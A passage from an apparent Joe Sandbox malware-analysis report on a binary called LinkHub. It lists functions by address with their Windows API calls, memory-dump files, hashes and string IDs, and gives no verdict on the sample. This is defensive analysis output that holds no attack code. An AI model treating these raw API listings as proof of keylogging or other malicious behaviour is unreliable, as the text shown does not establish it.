                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CF4932
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00CF496B
                                                                    • CoGetObject.OLE32(?,00000000,00D10B64,?), ref: 00CF498A
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00CF499D
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CF4A21
                                                                    • VariantClear.OLEAUT32(?), ref: 00CF4A35
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                    • String ID:
                                                                    • API String ID: 429561992-0
                                                                    • Opcode ID: dec386ed1ce53dedc175f9ca507d3847733218f66d1a462b414cf7c1f17fd046
                                                                    • Instruction ID: 86d0071b62c3508ff696f6ddd05b3029ef48ab2dd1df883fff197f36379386d8
                                                                    • Opcode Fuzzy Hash: dec386ed1ce53dedc175f9ca507d3847733218f66d1a462b414cf7c1f17fd046
                                                                    • Instruction Fuzzy Hash: 11C11271604305AFC744DF68C88492BBBE9EF89748F10491DFA999B250DB70ED45CB62
                                                                    Function 00CE84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00CE8538
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CE85D4
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00CE85E8
                                                                    • CoCreateInstance.OLE32(00D10CD4,00000000,00000001,00D37E8C,?), ref: 00CE8634
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CE86B9
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00CE8711
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00CE879C
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CE87BF
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00CE87C6
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00CE881B
                                                                    • CoUninitialize.OLE32 ref: 00CE8821
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2762341140-0
                                                                    • Opcode ID: 871019c3aa1d86cce432510a94170b568c805128f5932bf18c4d93cbdb6d80c4
                                                                    • Instruction ID: e5a888ac25283a622d4b141e9d3c57c286bec954d9dfe5e229ae7841d6e66285
                                                                    • Opcode Fuzzy Hash: 871019c3aa1d86cce432510a94170b568c805128f5932bf18c4d93cbdb6d80c4
                                                                    • Instruction Fuzzy Hash: E5C1E875A00245AFDB14DFA5C888DAEBBF9EF48304B148499F519EB361DB30EE45CB90
                                                                    Function 00CD0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CD039F
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00CD03F8
                                                                    • VariantInit.OLEAUT32(?), ref: 00CD040A
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CD042A
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00CD047D
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CD0491
                                                                    • VariantClear.OLEAUT32(?), ref: 00CD04A6
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00CD04B3
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CD04BC
                                                                    • VariantClear.OLEAUT32(?), ref: 00CD04CE
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CD04D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 4f088a674cc1720815204a5e0c97f9c9d88e9fccca41c0d8696c76eed13717a1
                                                                    • Instruction ID: e418be47df32e7a3cd1ac5c24217cd3624f48364f8f2d3094474f11b3e2a36c7
                                                                    • Opcode Fuzzy Hash: 4f088a674cc1720815204a5e0c97f9c9d88e9fccca41c0d8696c76eed13717a1
                                                                    • Instruction Fuzzy Hash: A7415235A002199FCB10DFA9D844EAD7BB9FF48354F10806AEA59E7361D730E945CBA0
                                                                    Function 00CDA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00CDA65D
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00CDA6DE
                                                                    • GetKeyState.USER32(000000A0), ref: 00CDA6F9
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00CDA713
                                                                    • GetKeyState.USER32(000000A1), ref: 00CDA728
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00CDA740
                                                                    • GetKeyState.USER32(00000011), ref: 00CDA752
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00CDA76A
                                                                    • GetKeyState.USER32(00000012), ref: 00CDA77C
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00CDA794
                                                                    • GetKeyState.USER32(0000005B), ref: 00CDA7A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: cbd977c187b4586ccdd0eaf5567e434863003bbf26700a449956d701807a2722
                                                                    • Instruction ID: 480018bb37ad617e37ebab53ab3cbeb3f2392bf59a5df100532cf1ac9ed61085
                                                                    • Opcode Fuzzy Hash: cbd977c187b4586ccdd0eaf5567e434863003bbf26700a449956d701807a2722
                                                                    • Instruction Fuzzy Hash: FF41A4645047C96DFF31976088043B5BEB16B12344F09805BD7E64A7C2EBA49BC8C7A3
                                                                    Function 00CF0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00CF1019
                                                                    • inet_addr.WSOCK32(?), ref: 00CF1079
                                                                    • gethostbyname.WSOCK32(?), ref: 00CF1085
                                                                    • IcmpCreateFile.IPHLPAPI ref: 00CF1093
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF1123
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF1142
                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00CF1216
                                                                    • WSACleanup.WSOCK32 ref: 00CF121C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: aa89018a0ed4917a3c0ff5e25e843e75405127954dc60c9dfb6d6a18bf438371
                                                                    • Instruction ID: c17bde372e8bdafe540908b8f38211d55c8beab3285483d2d3f3d50aced1040a
                                                                    • Opcode Fuzzy Hash: aa89018a0ed4917a3c0ff5e25e843e75405127954dc60c9dfb6d6a18bf438371
                                                                    • Instruction Fuzzy Hash: B4919E31604201DFD760DF15C888B2ABBE1BF44318F188599EA69CB7A2C731ED45CB92
                                                                    Function 00CF9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharLower
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 707087890-567219261
                                                                    • Opcode ID: ffaa82cc9068dd9af3910d4d3b208f873944a74e4e4599dc459b8ac9f5a3a6a1
                                                                    • Instruction ID: 6b9d199921eefd4092daec56ebda3ecafda1bcdf1686045583235d2e7f028a84
                                                                    • Opcode Fuzzy Hash: ffaa82cc9068dd9af3910d4d3b208f873944a74e4e4599dc459b8ac9f5a3a6a1
                                                                    • Instruction Fuzzy Hash: 80510631A0011A9BCF14DF68C940ABDB7A1FF25360B214229E93AE72C4D731DE40D792
                                                                    Function 00CF4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32 ref: 00CF41D1
                                                                    • CoUninitialize.OLE32 ref: 00CF41DC
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00D10B44,?), ref: 00CF4236
                                                                    • IIDFromString.OLE32(?,?), ref: 00CF42A9
                                                                    • VariantInit.OLEAUT32(?), ref: 00CF4341
                                                                    • VariantClear.OLEAUT32(?), ref: 00CF4393
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 636576611-1287834457
                                                                    • Opcode ID: 97898eedfc576aed25ae61fa1ff5fb782b622dd7f92c92c5fa17156829c62b06
                                                                    • Instruction ID: f6391de7c5134f60233acd9b011d74c96346939548609448a9a85e0452c3137d
                                                                    • Opcode Fuzzy Hash: 97898eedfc576aed25ae61fa1ff5fb782b622dd7f92c92c5fa17156829c62b06
                                                                    • Instruction Fuzzy Hash: E361C070608305AFC314DF65C888B6BBBE4EF48714F10491AF685972A1CB70ED48DB93
                                                                    Function 00CE8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 00CE8C9C
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CE8CAC
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CE8CB8
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CE8D55
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8D69
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8D9B
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CE8DD1
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8DDA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                    • String ID: *.*
                                                                    • API String ID: 1464919966-438819550
                                                                    • Opcode ID: 9c48fb031b0fe8785b6ea165ede02f867bd2ee33a1c96531efb84cb28469bfc6
                                                                    • Instruction ID: c0934d31c6f21dda63889e375a8b118782f6618f41cbdbd8c3f7023148bc0613
                                                                    • Opcode Fuzzy Hash: 9c48fb031b0fe8785b6ea165ede02f867bd2ee33a1c96531efb84cb28469bfc6
                                                                    • Instruction Fuzzy Hash: 63614872504345AFCB10EF65C88499EB3E8FF99310F04891EF99987251DB31EA49CBA2
                                                                    Function 00D046E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateMenu.USER32 ref: 00D04715
                                                                    • SetMenu.USER32(?,00000000), ref: 00D04724
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D047AC
                                                                    • IsMenu.USER32(?), ref: 00D047C0
                                                                    • CreatePopupMenu.USER32 ref: 00D047CA
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D047F7
                                                                    • DrawMenuBar.USER32 ref: 00D047FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                    • String ID: 0$F
                                                                    • API String ID: 161812096-3044882817
                                                                    • Opcode ID: 7e3d1d94ab5f089b196f11ff91dd34ab4a34874ca0d0f62d0faba2f32f73c0a6
                                                                    • Instruction ID: 781d461896318efff3aaeba7c76368cba86172719bae37667edd458b6b4c6c11
                                                                    • Opcode Fuzzy Hash: 7e3d1d94ab5f089b196f11ff91dd34ab4a34874ca0d0f62d0faba2f32f73c0a6
                                                                    • Instruction Fuzzy Hash: D2411CB5A01305AFDB24DFA4D848FAA7BB6FF4A314F144429FA4997390D770A914CF60
                                                                    Function 00CD282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00CD28B1
                                                                    • GetDlgCtrlID.USER32 ref: 00CD28BC
                                                                    • GetParent.USER32 ref: 00CD28D8
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD28DB
                                                                    • GetDlgCtrlID.USER32(?), ref: 00CD28E4
                                                                    • GetParent.USER32(?), ref: 00CD28F8
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD28FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 711023334-1403004172
                                                                    • Opcode ID: 9b626d0e0f495f745e2d9f38a4fc651c85ae31b1efe65afed164aed186299039
                                                                    • Instruction ID: 2ebde126d821a0c6848d28a0e50b366440cd9c0dee59fb9e216560cc0b10345f
                                                                    • Opcode Fuzzy Hash: 9b626d0e0f495f745e2d9f38a4fc651c85ae31b1efe65afed164aed186299039
                                                                    • Instruction Fuzzy Hash: D421B075900218BBCF04ABA0CC85EEEBBB5EF15310F504117BA65A33A1DB354908EB70
                                                                    Function 00CD290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00CD2990
                                                                    • GetDlgCtrlID.USER32 ref: 00CD299B
                                                                    • GetParent.USER32 ref: 00CD29B7
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD29BA
                                                                    • GetDlgCtrlID.USER32(?), ref: 00CD29C3
                                                                    • GetParent.USER32(?), ref: 00CD29D7
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD29DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 711023334-1403004172
                                                                    • Opcode ID: 0b874fb31047d72811392c20e3df8dd19a6ea90f9735dcf21df7d8e9b307ae92
                                                                    • Instruction ID: cdda2dcb8c4dded9945634fc8cf8efaaaf7faedb0c9a88d427cf9219e6d09842
                                                                    • Opcode Fuzzy Hash: 0b874fb31047d72811392c20e3df8dd19a6ea90f9735dcf21df7d8e9b307ae92
                                                                    • Instruction Fuzzy Hash: D021D175900218BBCF10ABA0CC85FEEBBB9EF14300F508117BA55A32A1DB358909DB70
                                                                    Function 00D044BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D04539
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D0453C
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D04563
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D04586
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D045FE
                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00D04648
                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00D04663
                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00D0467E
                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00D04692
                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00D046AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: f33313aad60bc643fe1a2bcdebf0df20157173312119f6b87b8f0688bce4a8a6
                                                                    • Instruction ID: d2e46d2215b6e6c81f4ed1f622cad9abb4b71164315562d1fee5a1745792f1b2
                                                                    • Opcode Fuzzy Hash: f33313aad60bc643fe1a2bcdebf0df20157173312119f6b87b8f0688bce4a8a6
                                                                    • Instruction Fuzzy Hash: 5B6168B5A00218AFDB10DFA4CC81FEE77B8EB0A310F544159FA18E73A1D775A985DB60
                                                                    Function 00CDBAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CDBB18
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBB2C
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00CDBB33
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBB42
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CDBB54
                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBB6D
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBB7F
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBBC4
                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBBD9
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBBE4
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: dbdce8ddd12c7c7624d08b516bb727c14a41129161f99ddd55c0a2c265bea90e
                                                                    • Instruction ID: dcc0f561da10935c19f0be8888c045c2c953e4b3efde54da5ae2d99f891f1011
                                                                    • Opcode Fuzzy Hash: dbdce8ddd12c7c7624d08b516bb727c14a41129161f99ddd55c0a2c265bea90e
